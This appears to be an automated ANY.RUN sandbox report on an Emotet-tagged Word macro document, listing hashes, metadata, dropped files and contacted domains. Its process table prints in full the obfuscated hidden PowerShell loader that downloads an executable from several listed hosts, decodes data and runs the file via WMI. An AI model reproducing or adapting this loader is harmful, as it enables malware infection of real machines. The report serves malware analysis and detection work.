analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

emo.doc

Full analysis: https://app.any.run/tasks/66fa25e0-854c-40d0-95c3-ed236f5dc5f1
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 29, 2020, 15:23:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Subject: Handmade Argentina Handcrafted Frozen Towels yellow Frozen virtual Guatemala array Lesotho JBOD, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 30 23:48:00 2020, Last Saved Time/Date: Tue Nov 3 02:14:00 2020, Number of Pages: 1, Number of Words: 9339, Number of Characters: 53237, Security: 8
MD5:

3079AF4D01EE6EC51BD3D9911DA7E23F

SHA1:

3EA711D020B52FB0490C359462451D4EDD471E33

SHA256:

C578A9FC241658517A7346A2A60236C84F0BB4919B857DB226150AAB4093451E

SSDEEP:

3072:evt3BDbKRPJivKie6B/w2yiWydh+bRevf1+l:evdlbKRPJiP/w2PCx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • POwersheLL.exe (PID: 3276)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3276)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 3276)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2468)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2468)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: Handmade Argentina Handcrafted Frozen Towels yellow Frozen virtual Guatemala array Lesotho JBOD
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:10:30 23:48:00
ModifyDate: 2020:11:03 02:14:00
Pages: 1
Words: 9339
Characters: 53237
Security: Locked for annotations
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 443
Paragraphs: 124
CharCountWithSpaces: 62452
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2468"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\emo.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3276POwersheLL -windowstyle hidden -ENCOD   S V     0 z X   ( [ T y P e ] ( " { 2 } { 0 } { 4 } { 3 } { 1 } " - f   ' e ' , ' r E C t o r Y ' , ' s Y s t ' , ' . I O . d I ' , ' M ' )     )   ;       s e t     T x y S e o     (     [ T Y p e ] ( " { 0 } { 7 } { 5 } { 6 } { 4 } { 2 } { 1 } { 8 } { 3 } " - F ' S Y s T E ' , ' T M ' , ' I N ' , ' E R ' , ' p O ' , ' N e T . s e ' , ' R V I C E ' , ' M . ' , ' A N a G ' ) )   ;     $ N b f 5 t g 3 = ( ' B 9 ' + ' y p ' + ( ' 9 0 ' + ' s ' ) ) ; $ V x n l r e 0 = $ C l u d k j x   +   [ c h a r ] ( 6 4 )   +   $ R 6 r 1 t u y ; $ K y 3 q 0 e 8 = ( ( ' R q ' + ' d x ' ) + ' w o ' + ' 5 ' ) ;     (     D i r     v a R i A b l e : 0 Z x ) . v a l u E : : " C r e A T ` E ` d I R E c ` T ` O r Y " ( $ H O M E   +   ( ( ( ' n D p ' + ' J r b ' ) + ( ' e ' + ' v k 4 n ' ) + ' D ' + ' p ' + ( ' C ' + ' c w r _ 2 h ' ) + ' n D ' + ' p ' )   - R e P l A c E   ( ' n ' + ' D p ' ) , [ c H a R ] 9 2 ) ) ; $ F N 5 g g m s H   =   ( 1 8 2 , 1 8 7 , 2 2 9 , 1 4 6 , 2 3 1 , 1 7 7 , 1 5 1 , 1 4 9 , 1 6 6 ) ; $ P y o z g e o = ( ( ' J 5 f ' + ' y 1 ' ) + ' c ' + ' c ' ) ;   (     v a R i A B L E   T x Y S E o     ) . V a l u E : : " S e c U r I ` T Y p ` R ` O t O c ` o l "   =   ( ( ' T l ' + ' s 1 ' ) + ' 2 ' ) ; $ F N 5 g g m s H   + =   ( 1 8 6 , 1 4 1 , 2 2 8 , 1 8 2 , 1 7 7 , 1 7 1 , 2 2 9 , 2 3 6 , 2 3 9 , 2 3 9 , 2 3 9 , 2 2 8 , 1 8 1 , 1 8 2 , 1 7 1 , 2 2 9 , 2 3 4 , 2 3 9 , 2 3 9 , 2 2 8 ) ; $ H u a j g b 0 = ( ( ' J n ' + ' o ' ) + ' 5 g ' + ' a 1 ' ) ; $ B b 2 8 u m o   =   ( ( ' A l e ' + ' 7 g ' ) + ' _ 8 ' ) ; $ H s c e _ j s = ( ' K v ' + ( ' n b ' + ' o v _ ' ) ) ; $ S p k 5 1 u e = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ S c u s b k j = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . e ' + ' x ' ) + ' e ' ) ; $ F N 5 g g m s H   + =   ( 1 8 5 , 1 7 9 , 1 9 0 , 1 8 4 , 2 2 9 , 1 5 1 , 1 3 9 , 1 5 7 , 1 6 4 , 2 3 5 , 1 7 7 , 2 3 9 , 1 7 1 , 1 8 3 , 2 3 6 , 1 4 1 , 1 2 8 , 1 8 7 , 2 3 5 , 1 3 4 , 1 2 8 , 1 5 8 , 1 7 7 , 1 7 6 , 1 3 9 ) ; $ h b m s k V 2 T = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ h b m s k V 2 T = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . c ' + ' o ' ) + ' n f ' ) ; $ Q 1 _ y 0 5 _ = ( ' W ' + ( ' 4 ' + ' q v y ' ) + ' z 8 ' ) ; $ O d b 3 h f 3 = & ( ' n ' + ' e ' + ' w - o b j e c t ' )   N e t . W E B c l I E N t ; $ F N 5 g g m s H   + =   ( 1 8 3 , 1 5 4 , 1 7 3 , 1 2 8 , 1 7 5 , 1 5 1 , 2 3 8 , 1 4 0 , 1 8 3 , 1 6 2 , 2 2 8 , 1 7 0 , 1 7 3 , 1 7 9 , 2 2 9 ) ; $ A n b y t 1 y = ( ' h ' + ( ' t t p : ' + ' ] [ ' + ' ( s ) ] ' ) + ( ( ' w ] ' + ' [ ( ' ) ) + ( ( ' s ) ' + ' ] w ' ) ) + ( ' d a ' + ' - ' ) + ' i ' + ' n ' + ' d u ' + ( ' s ' + ' t r i a l . ' + ' h ' + ' t ' ) + ' b ] ' + ( ' [ ( s ) ] ' + ' w ' + ' j s ' ) + ( ( ' ] ' + ' [ ( ' ) ) + ( ( ' s ' + ' ) ] w 9 I d L ' + ' P ] [ ' + ' ( s ' + ' ) ] w ' + ' @ h ' ) ) + ( ' t ' + ' t p : ] ' ) + ( ' [ ( s ' + ' ) ] ' ) + ' w ' + ( ' ] ' + ' [ ( s ) ] ' ) + ( ' w d a p ' + ' r o ' + ' f e s i o n a ' + ' l . h ' ) + ' t b ' + ( ' ] [ ( s ' + ' ) ' + ' ] ' ) + ' w ' + ( ' d ' + ' a t a ' ) + ( ' 4 ] [ ( s ' + ' ) ] w h ' ) + ( ' W g W ' + ' j T ' ) + ( ' V ] ' + ' [ ' ) + ( ' ( s ) ] w @ h t t p ' + ' s : ] [ ( s ' + ' ) ] ' + ' w ' + ' ] ' ) + ' [ ' + ( ' ( s ) ' + ' ] w d a g ' + ' r a ' ) + ' n i ' + ' t ' + ( ' e g ' + ' i a ' ) + ( ' r e . h ' + ' t ' ) + ' b ] ' + ( ' [ ' + ' ( s ) ' ) + ( ' ] w w ' + ' p - a ' + ' d m ' + ' i n ] [ ( s ) ' + ' ] w t ' ) + ( ' V ] [ ' + ' ( s ' + ' ) ' ) + ( ' ] w @ ' + ' h ' ) + ' t t ' + ' p ' + ( ' : ' + ' ] [ ' ) + ( ' ( s ) ] w ] [ ' + ' ( s ' + ' ) ] w w w ' + ' w ' + ' . o u t ' + ' s ' + ' p ' ) + ( ' o k ' + ' e ' ) + ' n v ' + ' i ' + ( ' s ' + ' i o n s . ' ) + ( ' h t b ' + ' ] ' ) + ' [ ' + ( ' ( s ) ] w ' + ' w p ' + ' - i n ' ) + ( ' c l u ' + ' d ' ) + ( ' e s ] [ ( s ) ' + ' ] w a W ' + ' o ' + ' M ' ) + ( ' ] ' + ' [ ( ' + ' s ) ] w ' ) + ( ' @ ' + ' h t t p : ] ' ) + ( ' [ ( s ) ' + ' ] w ] [ ( ' + ' s ) ' ) + ( ' ] w m o ' + ' b s ' ) + ( ' o ' + ' u k . h ' ) + ( ( ' t ' + ' b ] [ ( ' ) ) + ( ( ' s ) ' + ' ] w w p - ' ) ) + ' i n ' + ' c ' + ' l ' + ( ' u d e ' + ' s ] ' + ' [ ' ) + ( ' ( s ) ] ' + ' w ' ) + ( ' U Y ' + ' 3 0 R ] ' ) + ( ' [ ( s ' + ' ) ] w ' + ' @ ' + ' h ' + ' t t p : ] [ ' ) + ( ' ( ' + ' s ) ] w ' ) + ( ' ] [ ' + ' ( s ) ' ) + ( ' ] ' + ' w b ' ) + ' i ' + ( ' g ' + ' l a u g h ' + ' s ' ) + ( ( ' . h ' + ' t ' + ' b ] [ ( s ' ) ) + ( ( ' ) ] ' ) ) + ( ' w s ' + ' m a l l p o t ' + ' a t o ' ) + ' e s ' + ( ( ' ] ' + ' [ ( s ' ) ) + ( ( ' ) ] w Y ] ' + ' [ ( s ' + ' ) ] w ' + ' @ h ' + ' t t p s : ] [ ( s ) ' ) ) + ' ] w ' + ( ' ] [ ( ' + ' s ) ] w n ' + ' g ' ) + ( ' l l ' + ' o ' ) + ( ' g i s t ' + ' i ' ) + ( ' c s . ' + ' h ' ) + ' t ' + ( ' b ] ' + ' [ ' + ' ( ' + ' s ) ] w ' ) + ' a d ' + ( ' m i ' + ' n ' ) + ' e r ' + ' ] ' + ( ' [ ( s ' + ' ) ] w ' + ' W 3 m ' ) + ' k ' + ( ( ' B ' + ' ] [ ( s ' ) ) + ( ( ' ) ' + ' ] w ' ) ) ) . " r e p ` L A c E " ( ( ' ] ' + ' [ ' + ( ' ( s ) ] ' + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s P ` l I T " ( $ I v g 3 z c u   +   $ V x n l r e 0   +   $ J z a e w d y ) ; $ G c o y v l v = ( ( ' K f ' + ' _ ' ) + ( ' 9 ' + ' e t 1 ' ) ) ; f o r e a c h   ( $ A 8 i 3 k e 1   i n   $ A n b y t 1 y ) { t r y { $ O d b 3 h f 3 . " d O ` W n L O A ` d f I L e " ( $ A 8 i 3 k e 1 ,   $ S c u s b k j ) ; $ Z h c n a u x = ( ( ' E k ' + ' k ' ) + ( ' j ' + ' 4 7 t ' ) ) ; I f   ( ( & ( ' G e t - I ' + ' t e ' + ' m ' )   $ S c u s b k j ) . " L E n ` G T h "   - g e   4 5 1 9 9 )   { $ { A 8 ` I ` 3 K E 1 } . ( " { 1 } { 2 } { 0 } "   - f ' a y ' , ' T o C h a ' , ' r A r r ' ) . I n v o k e ( )   |   . ( " { 2 } { 1 } { 0 } { 3 } "   - f ' - ' , ' a c h ' , ' F o r E ' , ' O b j e c t ' )   - p r o c e s s   {   $ { F N 5 ` G G m ` S h }   + =   ( [ b y t e ] [ c h a r ] $ { _ }   - b x o r   0 x d f   )   } ;   $ F N 5 g g m s H   + =   ( 2 2 8 ) ;   $ b 0 R j e   =     [ t y p e ] ( " { 1 } { 0 } "   - F ' V e r T ' , ' C o n ' ) ;       $ B 0 R j E : : " t O ` B a S ` E 6 4 S ` T R I ` N g " ( $ { f n 5 ` g g m ` s h } )   |   . ( " { 2 } { 1 } { 0 } "   - f   ' i l e ' , ' u t - f ' , ' o ' )   $ { h B ` m S K ` V 2 T } ;   ( [ w m i c l a s s ] ( ( ' w i ' + ' n ' ) + ( ' 3 2 _ ' + ' P r o c ' + ' e ' ) + ' s ' + ' s ' ) ) . " c R ` e a T E " ( $ S c u s b k j ) ; $ G l w k i 6 a = ( ' I ' + ' m ' + ( ' t d ' + ' x v 6 ' ) ) ; b r e a k ; $ P f p b l h 1 = ( ' V s ' + ( ' l a l ' + ' c ' ) + ' u ' ) } } c a t c h { } } $ F 4 7 i e f 2 = ( ( ' B n ' + ' z i d ' ) + ' r t ' )  C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 003
Read events
1 129
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2468WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7008.tmp.cvr
MD5:
SHA256:
3276POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ABZ3ZN2OBTMU50HR8A1K.temp
MD5:
SHA256:
3276POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:F17FB243611FC8D2B382ABB444B83A98
SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869
3276POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF127d46.TMPbinary
MD5:F17FB243611FC8D2B382ABB444B83A98
SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869
2468WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$emo.docpgc
MD5:DBD33692D1DAD5823BD3159ABEBF819C
SHA256:7A3C1640AEA708D0D0C3F0B097AE2973F1D83FFF2C15752A8107A16FB0C0EF43
2468WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:5B2667DD3799554F07C10A4BC48229D1
SHA256:25834F223B08F669F5F82E5ADAA3E322A9CF8689F9504AF1E0969683E27B0557
2468WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4DC898A9094BAA8F9A15C8E8498AFEED
SHA256:E1EA826430030579D3560110227E5D9B421954DBCB2728EE5643E56EB6DBBF40
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
7
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
da-industrial.htb
malicious
daprofesional.htb
malicious
dagranitegiare.htb
malicious
www.outspokenvisions.htb
whitelisted
mobsouk.htb
unknown
biglaughs.htb
malicious
ngllogistics.htb
malicious

Threats

No threats detected
No debug info